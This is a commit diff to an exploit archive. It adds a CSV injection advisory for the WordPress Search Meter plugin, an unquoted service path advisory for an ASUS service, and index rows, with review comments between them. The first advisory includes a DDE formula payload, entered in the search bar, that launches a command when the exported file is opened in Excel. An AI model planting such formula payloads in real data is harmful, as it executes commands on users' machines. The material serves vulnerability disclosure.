DB: 2020-03-12
2 changes to exploits/shellcodes

ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path
Wordpress Plugin Search Meter 2.13.2 - CSV injection
parent 0a0ad49d15
commit 3c74040d79
3 changed files with 63 additions and 0 deletions
27
exploits/php/webapps/48197.txt
Normal file
|
@ -0,0 +1,27 @@
|
|||
# Exploit Title: Wordpress Plugin Search Meter 2.13.2 - CSV Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-03-10
|
||||
# Exploit Author: Daniel Monzón (stark0de)
|
||||
# Vendor Homepage: https://thunderguy.com/semicolon/
|
||||
# Software Link: https://downloads.wordpress.org/plugin/search-meter.2.13.2.zip
|
||||
# Version: 2.13.2
|
||||
# Tested on: Windows 7 x86 SP1
|
||||
# CVE : N/A
|
||||
|
||||
There is a CSV injection vulnerability in the Export function of the Search Meter plugin version
|
||||
|
||||
1) First we introduce the payload in the search bar in Wordpress
|
||||
|
||||
=cmd|' /C notepad'!'A1'
|
||||
|
||||
|
||||
2) Then we go to http://127.0.0.1/wordpress/wp-admin/index.php?page=search-meter%2Fadmin.php and export the CSV file
|
||||
|
||||
|
||||
3) After that we open the file in Excel, and import data from an external file, using comma as separator
|
||||
|
||||
|
||||
4) Payload gets executed
|
||||
|
||||
|
||||
Tested on Windows 7 Pro SP1 32-bit, Wordpress 5.3.2 and Excel 2016
|
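Review bot: The summary sentence in 48197.txt ("There is a CSV injection vulnerability in the Export function of the Search Meter plugin version") stops before the version number; finish it with the version given in the header, 2.13.2. The write-up would also serve plugin users better if it stated that exported search terms reach the CSV without a leading `=` being neutralised, which is what the steps imply, and if step 3 said whether the file is opened directly or brought in through Excel's data import, since the text mentions both.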
34
exploits/windows/local/48193.txt
Normal file
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path
|
||||
# Discovery by: Roberto Piña
|
||||
# Discovery Date: 2020-03-10
|
||||
# Vendor Homepage: https://www.asus.com/
|
||||
# Software Link :https://dlcdnets.asus.com/pub/ASUS/misc/utils/AISuite3_Win10_H97M-Pro_V10102.zip?_ga=2.170180192.1334401606.1583873755-790266082.1583873755
|
||||
# Tested Version: 1.02.00
|
||||
# Vulnerability Type: Unquoted Service Path
|
||||
# Tested on OS: Windows 10 Home x64 en
|
||||
|
||||
# Step to discover Unquoted Service Path:
|
||||
|
||||
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "asComSvc" | findstr /i /v """
|
||||
ASUS Com Service asComSvc C:\Program Files (x86)\ASUS\AXSP\1.02.00\atkexComSvc.exe Auto
|
||||
|
||||
C:\>sc qc asComSvc
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: asComSvc
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files (x86)\ASUS\AXSP\1.02.00\atkexComSvc.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : ASUS Com Service
|
||||
DEPENDENCIES : RpcSs
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
#Exploit:
|
||||
# A successful attempt would require the local user to be able to insert their code in the system root path
|
||||
# undetected by the OS or other security applications where it could potentially be executed during
|
||||
# application startup or reboot. If successful, the local user's code would execute with the elevated
|
||||
# privileges of the application.
|
|
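Review bot: The "#Exploit:" paragraph in 48193.txt is generic and does not show the precondition it depends on: nothing in the file documents that a non-administrative user can write to any directory along BINARY_PATH_NAME, and "system root path" does not match the C:\Program Files (x86)\ASUS\AXSP\1.02.00\ location reported by sc qc. Add the directory ACLs (for example icacls output) so readers can judge the real exposure, and state the fix, which is to wrap the service's binary path in quotes. The Software Link also carries a `_ga=` analytics parameter that should be dropped from the URL.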
@ -10987,6 +10987,7 @@ id,file,description,date,author,type,platform,port
|
|||
48180,exploits/windows/local/48180.cpp,"Microsoft Windows - 'WizardOpium' Local Privilege Escalation",2020-03-03,piotrflorczyk,local,windows,
|
||||
48185,exploits/linux/local/48185.rb,"OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)",2020-03-09,Metasploit,local,linux,
|
||||
48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,
|
||||
48193,exploits/windows/local/48193.txt,"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path",2020-03-11,"Roberto Piña",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
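Review bot: The new 48193 row gives its date as 2020-03-11, while 48193.txt in this same commit says "Discovery Date: 2020-03-10" and the commit is titled DB: 2020-03-12. If the column holds the publication date rather than the discovery date, say so in the CSV documentation; otherwise align the values. The row's position is fine: it sits at the end of the local block, ahead of the first remote entry.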
@ -42455,3 +42456,4 @@ id,file,description,date,author,type,platform,port
|
|||
48188,exploits/java/webapps/48188.txt,"Sysaid 20.1.11 b26 - Remote Command Execution",2020-03-10,"Ahmed Sherif",webapps,java,
|
||||
48189,exploits/php/webapps/48189.txt,"YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting",2020-03-10,En_dust,webapps,php,
|
||||
48190,exploits/php/webapps/48190.txt,"Persian VIP Download Script 1.0 - 'active' SQL Injection",2020-03-10,S3FFR,webapps,php,
|
||||
48197,exploits/php/webapps/48197.txt,"Wordpress Plugin Search Meter 2.13.2 - CSV injection",2020-03-11,"Daniel Monzón",webapps,php,
|
||||
|
|
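Review bot: The description in the added 48197 row reads "CSV injection" while the title in 48197.txt is "CSV Injection", and the author column has "Daniel Monzón" where the file credits "Daniel Monzón (stark0de)"; searches keyed on either string will miss one of the two. Pick one spelling for the title and decide whether the handle belongs in the author field. The date column, 2020-03-11, also differs from the file's "# Date: 2020-03-10".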